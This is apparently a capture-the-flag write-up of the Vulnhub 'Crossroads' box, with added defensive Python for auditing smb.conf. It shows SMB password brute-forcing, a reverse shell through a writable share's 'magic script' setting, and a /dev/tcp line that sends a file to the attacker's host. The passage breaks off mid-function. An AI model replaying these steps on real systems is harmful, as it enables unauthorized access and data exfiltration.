Crossroads

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.98.0/16   |   Screen View: Unique Hosts                                                                                                                                                             
                                                                                                                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:c4:83:a7      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.181  08:00:27:b8:0e:1f      1      60  PCS Systemtechnik GmbH      

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.181.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.181 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 06:45 EST
Nmap scan report for bogon (192.168.56.181)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B8:0E:1F (Oracle VirtualBox virtual NIC)
Service Info: Host: CROSSROADS

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2022-11-16T05:46:02-06:00
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-16T11:46:02
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds

The target host has three open ports: 80 (http), while the other two (139 and 445) are Samba.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient -L 192.168.56.181                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbshare        Disk      
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CROSSROADS

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient //192.168.56.181/smbshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED


└─$ enum4linux 192.168.56.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 16 06:50:29 2022

 =========================================( Target Information )=========================================

Target ........... 192.168.56.181
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.181 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.56.181 )===============================

Looking up status of 192.168.56.181
        CROSSROADS      <00> -         B <ACTIVE>  Workstation Service
        CROSSROADS      <03> -         B <ACTIVE>  Messenger Service
        CROSSROADS      <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                                                                       
                                                                                                                                                                                                                                  
S-1-22-1-1000 Unix User\albert (Local User)                                                                                                                                                                                       

[+] Enumerating users using SID S-1-5-21-198007098-3908253677-2746664996 and logon username '', password ''                                                                                                                       
                                                                                                                                                                                                                                  
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)                                                                                                                                                       
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)

This reveals the username albert.

Next, take a look at port 80.

From the page source, the target site runs WordPress.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/robots.txt     
User-agent: *
Disallow: /crossroads.png

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ wget http://192.168.56.181/crossroads.png 
--2022-11-16 06:55:46--  http://192.168.56.181/crossroads.png
Connecting to 192.168.56.181:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100255 (1.0M) [image/png]
Saving to: ‘crossroads.png’

crossroads.png                                           100%[================================================================================================================================>]   1.05M  --.-KB/s    in 0.02s   

2022-11-16 06:55:46 (68.9 MB/s) - ‘crossroads.png’ saved [1100255/1100255]

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png  nmap_full_scan
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ steghide extract -sf crossroads.png 
Enter passphrase: 
steghide: the file format of the file "crossroads.png" is not supported.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegseek  crossroads.png /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file "crossroads.png" is not supported.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                      
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/16 06:57:15 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 217109 / 220561 (98.43%)
===============================================================
2022/11/16 06:57:44 Finished
===============================================================
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ dirb http://192.168.56.181

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Nov 16 06:57:55 2022
URL_BASE: http://192.168.56.181/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.181/ ----
+ http://192.168.56.181/index.html (CODE:200|SIZE:93075)                                                                                                                                                                         
+ http://192.168.56.181/robots.txt (CODE:200|SIZE:42)                                                                                                                                                                            
+ http://192.168.56.181/server-status (CODE:403|SIZE:279)                                                                                                                                                                        
                                                                                                                                                                                                                                 
-----------------
END_TIME: Wed Nov 16 06:57:56 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2022/11/16 06:58:12 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 93075]
/robots.txt           (Status: 200) [Size: 42]
/note.txt             (Status: 200) [Size: 108]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099489 / 1102805 (99.70%)
===============================================================
2022/11/16 07:00:41 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/note.txt                                                          
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu       

I had no idea what this meant, so I went back to cracking SMB, since the username is already known.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ hydra -l albert -P /usr/share/wordlists/rockyou.txt smb://192.168.56.181
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-16 07:05:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.181:445/
[STATUS] 5065.00 tries/min, 5065 tries in 00:01h, 14339334 to do in 47:12h, 1 active
[STATUS] 5236.67 tries/min, 15710 tries in 00:03h, 14328689 to do in 45:37h, 1 active
[STATUS] 5268.00 tries/min, 36876 tries in 00:07h, 14307523 to do in 45:16h, 1 active
[STATUS] 5246.70 tries/min, 78788 tries in 00:15h, 14265611 to do in 45:19h, 1 active
[STATUS] 5231.90 tries/min, 162276 tries in 00:31h, 14182123 to do in 45:11h, 1 active
[STATUS] 5222.51 tries/min, 245545 tries in 00:47h, 14098854 to do in 44:60h, 1 active
^C
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

It did not crack; according to other people's writeups, medusa is needed instead.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ medusa -h 192.168.56.181 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 12345 (2 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456789 (3 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: password (4 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: iloveyou (5 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: princess (6 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 1234567 (7 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: bradley1 (3842 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.56.181 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]

The password was cracked very quickly: bradley1 (it seems you really cannot rely on a single tool).

The modules Medusa supports are located in:

┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ find / -name *medusa* 2>/dev/null
/usr/lib/x86_64-linux-gnu/medusa
/usr/lib/python3/dist-packages/faraday_plugins/plugins/repo/medusa
/usr/bin/medusa
/usr/share/bash-completion/completions/medusa
/usr/share/doc/medusa
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ cd /usr/lib/x86_64-linux-gnu/medusa                            
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ ls
modules
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ cd modules                         
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls -alh | grep smb            
-rwxr-xr-x 1 root root  42K May 15  2022 smbnt.mod
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls                
cvs.mod  http.mod  mssql.mod  nntp.mod        pop3.mod      rexec.mod   rsh.mod    smtp.mod       snmp.mod  svn.mod     vmauthd.mod  web-form.mod
ftp.mod  imap.mod  mysql.mod  pcanywhere.mod  postgres.mod  rlogin.mod  smbnt.mod  smtp-vrfy.mod  ssh.mod   telnet.mod  vnc.mod      wrapper.mod

Next, log in to SMB with the password cracked above.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
[sudo] password for kali: 
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> get smb.conf
getting file \smb.conf of size 8779 as smb.conf (4286.4 KiloBytes/sec) (average 4286.6 KiloBytes/sec)
smb: \> exit
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png  hydra.restore  nmap_full_scan  smb.conf
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ cat smb.conf           
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
   logging = file

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap config * :              backend = tdb
;   idmap config * :              range   = 3000-7999
;   idmap config YOURDOMAINHERE : backend = tdb
;   idmap config YOURDOMAINHERE : range   = 100000-999999
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 means that usershare is disabled.
#   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[smbshare]

path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no

This reveals the magic script option. Online explanations say that the script named by magic script is executed when the shared folder is opened; more precisely, per smb.conf(5), smbd executes a file of that name on behalf of the connected user once the client has written and closed it, which is consistent with the errors reported on close during the put below. So we write a script and upload it into this share folder.
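Reading the recovered smb.conf from the defender's side, the following is an added Python example (not code from this write-up) that parses the smb.conf format (';' and '#' comments, case- and whitespace-insensitive keys, 'read only' and its inverted synonyms) and flags the settings that matter on this box: a writable share carrying magic script, guest mapping, and non-mandatory SMB signing. Its sample input is a constructed excerpt of the page's own [global] and [smbshare] sections.

```python
"""Audit an smb.conf for settings that hand out code execution or anonymous access:
a writable share carrying `magic script`, guest mapping, non-mandatory signing.
Added example, not code from the original write-up."""
import re

# Constructed sample: an excerpt of the [global] and [smbshare] sections of the
# smb.conf recovered from the share (comments trimmed).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = bad user
   usershare allow guests = yes

[smbshare]

path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
"""

_SECTION = re.compile(r"^\[(?P<name>[^\]]+)\]$")
_PARAM = re.compile(r"^(?P<key>[^=]+?)\s*=\s*(?P<val>.*)$")


def _norm(key):
    """smbd ignores case and whitespace in parameter names: 'Read Only' == 'readonly'."""
    return re.sub(r"\s+", "", key).lower()


def parse_smb_conf(text):
    """Parse smb.conf into {section: {normalised_key: value}}, keeping line order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":  # both ';' and '#' introduce comments
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = _PARAM.match(line)
        if m and current is not None:
            sections[current][_norm(m.group("key"))] = m.group("val").strip()
    return sections


def _is_true(value, default=False):
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def share_is_writable(params):
    """Resolve 'read only' and its inverted synonyms; the last line wins, as in smbd."""
    writable = False  # smb.conf default: read only = yes
    for key, val in params.items():
        if key == "readonly":
            writable = not _is_true(val, default=True)
        elif key in ("writable", "writeable", "writeok"):
            writable = _is_true(val)
    return writable


def audit(sections):
    """Return (severity, section, message) findings for a parsed config."""
    findings = []
    g = sections.get("global", {})
    if g.get("maptoguest", "never").lower() != "never":
        findings.append(("medium", "global", "map to guest = %s: some failed logins become guest sessions" % g["maptoguest"]))
    if _is_true(g.get("usershareallowguests")):
        findings.append(("medium", "global", "usershare allow guests = yes: users may publish guest-accessible shares"))
    if g.get("serversigning", "default").lower() != "mandatory":
        findings.append(("low", "global", "server signing is not mandatory: SMB sessions can be relayed or tampered with"))
    for name, params in sections.items():
        if name == "global":
            continue
        if "magicscript" in params:  # smbd runs this file as the connected user when a client closes it
            sev = "critical" if share_is_writable(params) else "high"
            findings.append((sev, name, "magic script = %s on a %s share" % (params["magicscript"], "writable" if sev == "critical" else "read-only")))
        if _is_true(params.get("guestok")) or _is_true(params.get("public")):
            findings.append(("medium", name, "guest ok = yes: reachable without credentials"))
    return findings


if __name__ == "__main__":
    for sev, section, msg in audit(parse_smb_conf(SAMPLE_SMB_CONF)):
        print("[%s] %s: %s" % (sev.upper(), section, msg))
```

On the page's config this reports the smbshare magic script as critical because the share is writable by albert, exactly the combination that yields the shell later in the write-up.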

First start a listener on Kali, then connect to the target host over SMB and put the script; during the put, the shell is thrown back to Kali.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_UNSUCCESSFUL closing remote file \smbscript.sh
smb: \> ls
  .                                   D        0  Wed Nov 16 08:09:27 2022
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_IO_TIMEOUT closing remote file \smbscript.sh
smb: \> 

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 36580
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
albert@crossroads:/home/albert/smbshare$ 

Successfully obtained a shell.

Spawn another shell and download crossroads.png and the beroot file to Kali.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 8888 > cross.jpg
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 55362
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.6M
drwxr-xr-x 3 albert albert 4.0K Mar  6  2021 .
drwxr-xr-x 3 root   root   4.0K Mar  2  2021 ..
-rwsr-xr-x 1 root   root    17K Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar  2  2021 crossroads.png
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan  3  2021 user.txt
albert@crossroads:/home/albert$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
<$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
albert@crossroads:/home/albert$ 

Since steghide does not support PNG files, I looked at how others approached this and found a new tool: stegoveritas.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo pip install stegoveritas  
Collecting stegoveritas
  Downloading stegoveritas-1.9.tar.gz (77 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 77.8/77.8 kB 177.6 kB/s eta 0:00:00
  Preparing metadata (setup.py) ... done

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegoveritas cross.png 
ERROR:StegoVeritas:Missing the following required packages: foremost, libexempi3
ERROR:StegoVeritas:Either install them manually or run 'stegoveritas_install_deps'.
Running Module: SVImage
+---------------------------+------+
|        Image Format       | Mode |
+---------------------------+------+
| Portable network graphics | RGBA |
+---------------------------+------+
ERROR:stegoveritas.helpers:not supported for this image mode
ERROR:stegoveritas.helpers:
"""                    apng

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls                                                      
1668605632.515148-acdbbd842fee9302ae4de398d1ab2300   1668605655.125798-bcffc227ec961d9a422307bc56aa9f80   1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd  1668605662.1177938-deacfe6927ff1e957b146f28457567cf
1668605635.4692078-cdaac7888d6459d35735a7a017745968  1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb  1668605659.3538682-7aabde43efa4d275e91debe133aa8673  1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765   1668605657.028825-c3d9ec0541be0e353038bbaa263d8406   1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156  29
1668605654.491967-2c2e9e198566dca626c518c23661cabc   1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4  1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1  29.zlib

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd
/home/kali/Vulnhub/Crossroads/results/keepers

Only the first file looks like a password wordlist; rename it and upload it to the target host.
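The triage step above (picking the one text wordlist out of a directory of extracted blobs, a zlib chunk among them) is done by eye in the writeup. The following is an added example, not part of the original post or of stegoveritas, that automates that first pass with byte-level heuristics: printable-ASCII ratio and line count for a wordlist, and the zlib header check (CMF byte 0x78, header divisible by 31) followed by an inflate attempt for compressed chunks. The sample blobs and their names are constructed for the demonstration.

```python
import string
import zlib
from typing import Dict, Optional

# Bytes considered "text" for the wordlist heuristic.
PRINTABLE = set(string.printable.encode())
ZLIB_CMF = 0x78  # CMF byte of a zlib stream using deflate with a 32K window


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for an empty blob)."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def looks_like_zlib(data: bytes) -> bool:
    """zlib header check: CMF == 0x78 and (CMF * 256 + FLG) % 31 == 0."""
    return len(data) >= 2 and data[0] == ZLIB_CMF and (data[0] * 256 + data[1]) % 31 == 0


def inflate_if_zlib(data: bytes) -> Optional[bytes]:
    """Return the decompressed payload, or None if the header lied."""
    if not looks_like_zlib(data):
        return None
    try:
        return zlib.decompress(data)
    except zlib.error:
        return None


def classify_blob(data: bytes, min_lines: int = 3) -> str:
    """Label one extracted blob as 'wordlist', 'zlib' or 'binary'."""
    if looks_like_zlib(data):
        return "zlib"
    if printable_ratio(data) > 0.95 and data.count(b"\n") >= min_lines:
        return "wordlist"
    return "binary"


def triage(blobs: Dict[str, bytes]) -> Dict[str, str]:
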